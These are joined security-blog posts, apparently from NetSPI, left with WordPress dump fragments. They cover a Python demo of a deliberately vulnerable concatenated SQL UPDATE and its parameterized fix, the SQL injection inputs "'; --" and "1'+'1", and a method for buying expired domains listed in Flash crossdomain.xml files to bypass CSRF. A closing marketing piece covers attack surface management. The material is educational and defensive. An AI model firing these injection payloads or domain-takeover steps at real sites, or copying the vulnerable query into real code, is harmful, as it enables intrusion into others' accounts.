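import sqlite3

# Constructed rows with the same shape as the post's USERS table.
SAMPLE_USERS = [
    ("jake", "reynolds", "jreynoldsdev@gmail.com"),
    ("net", "spi", "alex@netspi.com"),
    ("johnjacob", "jingle", "heimer@schmidt.com"),
]


def fresh_db():
    """New in-memory database seeded with SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (username TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO USERS VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def update_email_concatenated(conn, username, email):
    """The vulnerable query from the post: input spliced into the SQL text.
    Returns the statement actually sent so the effect can be inspected."""
    sql = f"UPDATE USERS set email='{email}' where username='{username}';"
    conn.execute(sql)
    conn.commit()
    return sql


def update_email_parameterized(conn, username, email):
    """The fix: placeholders make the driver bind the values, so quotes and
    comment markers in the input never reach the SQL parser as syntax."""
    conn.execute("UPDATE USERS SET email=? WHERE username=?", (email, username))
    conn.commit()


def emails(conn):
    """{username: email} snapshot of the table."""
    return dict(conn.execute("SELECT username, email FROM USERS ORDER BY rowid"))


if __name__ == "__main__":
    for label, update in (("concatenated", update_email_concatenated),
                          ("parameterized", update_email_parameterized)):
        db = fresh_db()
        update(db, "jake", "'; --")  # the post's "weekend ruiner" input
        print(f"{label:13s} after '; --  ->", emails(db))
    db = fresh_db()
    update_email_concatenated(db, "jake", "1'+'1")  # the post's safe probe
    print("concatenated  after 1'+'1  ->", emails(db))
```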

The Blind Leading the Blind

It was difficult to find any operators, functions, etc. that executed in the same way across all 3 databases. Coming up from behind for a cheap second place, though, is one operator that works on all 3 while doing different things. In MSSQL the + character acts as a form of string concatenation, as presented above. MySQL and Oracle initially failed any tests for this operator until it became clear that there it is for integer arithmetic. That gives the magical injection string of:
  MSSQL    MySQL    Oracle
  1'+'1    1'+'1    1'+'1
UPDATE USERS set email='1'+'1' where username='jake';

     username    password   email
  1  jake        reynolds   2
  2  net         spi        alex@netspi.com
  3  johnjacob   jingle     heimer@schmidt.com
In MSSQL the output will instead become 11, due to string concatenation. There it is! We now have an option that will allow us to inject blindly into queries for 3 major RDBMS', without potentially destroying their tables. The challenge going forward is expanding this to fit more RDBMS' and more complicated scenarios. That will be left as a challenge to the reader, but if you have any other ideas or comments please let us know below!

[post_title] => SQL Injection to Help You Sleep at Night

[21] => WP_Post Object ( [ID] => 6930 [post_date] => 2017-02-21 [post_content] =>

When someone buys a domain name the usual purchase length is one year, with certain DNS providers allowing multi-year purchases. Large entities can quickly lose track of all their domains, and keeping track of when those domains expire can be an even bigger hassle. When you add Flash integration into the mix it starts becoming a security issue. Adobe Flash has been known to have many vulnerabilities in the past, and my favorite is actually a feature. Flash has the feature of respecting a cross-domain policy for inter-site communication; the crossdomain.xml file lists valid external domains that can make requests to the Victim Site (VS). An example crossdomain.xml looks like this:
<cross-domain-policy>
<allow-access-from domain="valid.com"/>
<allow-access-from domain="testing.com"/>
<allow-access-from domain="example.com"/>
</cross-domain-policy>

Any of those sites has full cross-domain access to the VS. Many blogs have covered the topic of overly permissive cross-domain policies with rules like <allow-access-from domain="*"/> that allow access from any site. This blog will cover the topic of expired domains that are allowed in cross-domain files, which lets an attacker purchase that domain and gain full cross-domain access.

Cross-Domain Scanner

As stated before, cross-domain exploitation has been well documented, so I will link tutorials on defeating CSRF through the expired domains below. Here is how we can go about discovering those domains using my crossdomainscanner Python script, located here.

Prerequisites

~$ git clone https://github.com/NetSPI/crossdomainscanner
~$ cd crossdomainscanner
~$ pip install -r requirements.txt
I’ll start with identifying the VS I would like to scan, for this demo I’ll be using https://jakereynolds.co.  A VS can be found any number of ways and we can verify it has a cross-domain policy by accessing https://jakereynolds.co/crossdomain.xml.   We’ll then feed this into the cross-domain scanner with the command:
python scanner.py https://jakereynolds.co -v
Once the script is finished it will tell us if there are any expired domains in the policy.
Possible expired domains:
asdaasdasfwkjhcjhbwrgkljsv.com
thisisanexpireddomainaswell.es
jakereynoldsexpireddomain.com
We now know that https://jakereynoldsexpireddomain.com can gain cross-domain access to https://jakereynolds.co, instantly eliminating any CSRF protection that might have existed on the site.

Exploitation

The best way to exploit this is to take advantage of the CSRF bypass. Purchase the expired domain, make someone visit your site, and if they are logged in on the VS you can make requests in the context of their account. This is done by creating a Flash application for manipulating requests; see the Flash tutorial in the references below. If the VS does not have any valuable APIs, the cross-domain access does not warrant a valid finding, since nothing can be exploited through it.

Findings

Out of the Top 5000 Alexa domains:
  • 222 allow cross-origin requests from any domain (*)
  • 20 allow cross-origin requests from expired domain names
  • 20 allow cross-origin requests from domains with invalid TLDs (.local, .des, etc…)

Recommendation

As a site owner/maintainer it is best to run this script against your own domain and remove or repurchase any expired domains allowed in your crossdomain.xml file.  For long-term monitoring it would be good to incorporate this tool into your development pipeline so that it gets checked at least once every production deployment.  A permanent fix would be to remove Flash integration with the website, since Flash is already being deprecated in certain browsers.
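As an added example (not the crossdomainscanner project's own code), here is a minimal offline audit of a crossdomain.xml in the spirit of the recommendation above: it parses the policy, flags wildcard entries, entries with TLDs outside an allow-list, and entries whose registrable domain is not registered. The policy, the TLD list and the `fake_is_registered` registry stand-in are all constructed for this example; a real check would substitute a WHOIS or DNS lookup for the stand-in.

```python
import xml.etree.ElementTree as ET
from typing import Callable, Dict, List

# Constructed sample policy; the domains are illustrative, not real findings.
SAMPLE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="valid.com"/>
  <allow-access-from domain="*.testing.com"/>
  <allow-access-from domain="*"/>
  <allow-access-from domain="intranet.local"/>
  <allow-access-from domain="jakereynoldsexpireddomain.com"/>
</cross-domain-policy>"""

# Small illustrative TLD allow-list; a real check would use the IANA root zone list.
KNOWN_TLDS = {"com", "net", "org", "es", "co", "io"}

def allowed_domains(policy_xml: str) -> List[str]:
    """Return the domain attribute of every allow-access-from element."""
    root = ET.fromstring(policy_xml)
    return [el.get("domain", "") for el in root.iter("allow-access-from")]

def classify(domain: str, is_registered: Callable[[str], bool]) -> str:
    """Label one policy entry as wildcard, invalid-tld, expired or ok.

    A leading "*." is stripped so the registrable parent is what gets checked.
    """
    if domain == "*":
        return "wildcard"
    bare = domain[2:] if domain.startswith("*.") else domain
    tld = bare.rsplit(".", 1)[-1].lower()
    if "." not in bare or tld not in KNOWN_TLDS:
        return "invalid-tld"
    if not is_registered(bare):
        return "expired"
    return "ok"

def audit_policy(policy_xml: str, is_registered: Callable[[str], bool]) -> Dict[str, List[str]]:
    """Group the policy's entries by risk category, e.g. to fail a CI step on non-ok entries."""
    report: Dict[str, List[str]] = {"wildcard": [], "invalid-tld": [], "expired": [], "ok": []}
    for domain in allowed_domains(policy_xml):
        report[classify(domain, is_registered)].append(domain)
    return report

# Constructed stand-in for a WHOIS/DNS registration lookup so the example runs offline.
FAKE_REGISTRY = {"valid.com", "testing.com"}

def fake_is_registered(domain: str) -> bool:
    return domain in FAKE_REGISTRY

if __name__ == "__main__":
    for category, domains in audit_policy(SAMPLE_POLICY, fake_is_registered).items():
        print(f"{category}: {domains}")
```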

References

The Flash tutorial linked above is https://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html. In my time researching I discovered a similar tool for this written by @IAmMandatory; you can find that here.

Protect Your Growing Attack Surface in a Modern Environment
Jake Reynolds, 2023-05-02

Unmanaged attack surfaces are increasingly becoming a pathway for threat actors to gain access to systems, making effective attack surface management (ASM) more critical than ever before.  

According to research from Enterprise Strategy Group (ESG), more than half of businesses surveyed (52 percent) say that security operations are more difficult today than they were two years ago. The top reasons respondents indicated for increased challenges include an evolving threat landscape and a changing attack surface.  

Given the sophistication of threats today, a comprehensive attack surface management strategy can help proactively identify gaps and vulnerabilities while strengthening security controls.  

Let’s start by breaking down what an attack surface is. 

What is an Attack Surface? 

An attack surface is an accumulation of all the different points of entry on the internet that a threat actor could exploit to access your external-facing assets, such as hardware, software, and cloud assets. 

An enterprise attack surface may include digital attack surfaces, such as:  

  1. Application attack surface 
  2. Internet of Things (IoT) attack surface 
  3. Kubernetes attack surface 
  4. Network attack surface 
  5. Software attack surface 
  6. Cloud attack surface 

Other types of enterprise attack surfaces include human attack surfaces and physical attack surfaces. 
 
In our connected environment, a company's total number of attack surfaces and overall digital footprint continues to expand, which puts external-facing assets at risk for exposures and vulnerabilities. 
 
Cloud storage adoption and hybrid work environments that rely on cloud solutions are some of the top reasons for expanded attack surfaces. Another factor is that an uptick in mergers and acquisitions can lead to acquiring assets that may be unknown, resulting in unmanaged attack surfaces. 

How Are Attack Vectors and Attack Surfaces Related?  

Attack vectors and attack surfaces are related because attack surfaces comprise all of the attack vectors, which include any method a threat actor can use to gain unauthorized access to an environment. Examples of attack vectors include ransomware, malware, phishing, internal threats, misconfiguration, and compromised credentials, among many others – vectors can also exist as a combination of these examples listed.  

As attack vectors become more complex, security teams need to identify and implement new, more effective solutions to secure attack surfaces and stay ahead of sophisticated threat actors.  

Monitoring and protecting against evolving attack vectors becomes more critical as an attack surface grows. For the purpose of this article, we’re focusing on how to effectively manage external attack surfaces since this is a common challenge many businesses face. The external attack surface remains a priority for remediation because it presents a higher risk due to its exposure to the internet. 

What is Attack Surface Management? 

Many businesses struggle to keep up with their ever-evolving attack surface. The good news is that ASM vendors equip internal teams with the data needed to make decisions and methodically tackle remediation efforts.
 
Attack surface management provides continuous observability and risk assessment of your organization’s entire attack surface. When coupled effectively with continuous penetration testing, attack surface management helps companies improve their attack surface visibility, asset inventory, and understanding of their critical exposures. 

More specifically, external attack surface management (EASM) is the process of identifying and managing your organization’s attack surface, specifically from the outside-in view. The goal is to identify external assets that attackers could potentially leverage and discover exposures before malicious actors do.

Attack Surface Management Use-Cases 

Through the attack surface, adversaries can exploit exposures to identify vulnerabilities that will give them access to your organization. If threat actors are successful, then outcomes will vary depending on the attack surface and other factors—but they will undoubtedly be negative.  

Common outcomes include: 

  1. Deployment of malware on your network for the purposes of ransomware, or worse, killware. 
  2. Extraction of employee data such as social security numbers, healthcare data, and personal contact information. 

Effective asset management and change control processes are challenging, and even the most well-intentioned companies often see this as an area for improvement. The right attack surface management solution should include a combination of three core pillars: human expertise, continuous penetration testing, and prioritized exposures based on risk. 
 
Common reasons to invest in attack surface management include: 

  1. Continuous observability and risk management 
  2. Identification of external gaps in visibility 
  3. Discovery of known and unknown assets and Shadow IT 
  4. Risk-based vulnerability prioritization 
  5. Assessment of M&A and subsidiary risk 

Manage Growing Attack Surfaces with NetSPI 

NetSPI’s Attack Surface Management (ASM) platform helps security teams quickly discover and address vulnerabilities across growing attack surfaces before adversaries do.   
 
Four of the top five leading global cloud providers trust NetSPI for continuous threat and exposure management, leveraging our team, technology, and comprehensive methodology to detect known, unknown, and potentially vulnerable public-facing assets. 

Learn more about NetSPI’s attack surface management solutions or request a demo. Also check out our free Attack Surface Management Tool to search more than 800 million public records for potential attack surface exposures. 

Post summary (Protect Your Growing Attack Surface in a Modern Environment): Attack surface management is critical to protecting an organization's growing digital footprint in today's connected environment.